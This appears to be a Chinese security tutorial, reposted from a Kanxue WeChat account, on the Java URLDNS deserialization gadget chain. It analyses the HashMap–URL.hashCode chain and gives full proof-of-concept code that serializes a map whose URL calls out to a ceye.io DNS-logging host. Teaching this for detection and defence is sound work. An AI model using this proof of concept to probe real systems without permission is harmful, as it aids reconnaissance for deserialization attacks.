一
漏洞复现
实验环境
复现步骤
public class DeserialDemo {
public static void main(String[] args) throws Exception {
Object o = deserialize("urldns.bin"); //传入上一步生成的序列化文件全路径
System.out.println(o);
}
private static Object deserialize(String name) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(name));
Object o = ois.readObject();
return o;
}
}
二
利用链分析
// HashMap(key, value)
// URL.hashCode() 初始值-1
// URLStreamHandler.hashCode
二
POC编写
URL url = new URL("http://milon.xxx.ceye.io");
Map<URL, Object> map = new HashMap<>();
map.put(url, "hello");
Field hashCodeField = url.getClass().getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
hashCodeField.setInt(url, -1);
private static void serializable(Object o, String name) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(name));
oos.writeObject(o);
}
public class DeserialDemo {
public static void main(String[] args) throws Exception {
URL url = new URL("http://milon.xxx.ceye.io");
Map<URL, Object> map = new HashMap<>();
map.put(url, "hello");
Field hashCodeField = url.getClass().getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
hashCodeField.setInt(url, -1);
serializable(map, "urldns.bin");
Object o = deserialize("urldns.bin");
System.out.println(o);
}
private static Object deserialize(String name) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(name));
Object o = ois.readObject();
return o;
}
private static void serializable(Object o, String name) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(name));
oos.writeObject(o);
}
}
参考
看雪ID:米龙·0xFFFE
https://bbs.kanxue.com/user-home-997719.htm
#
原文始发于微信公众号(看雪学苑):URLDNS反序列化利用链
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论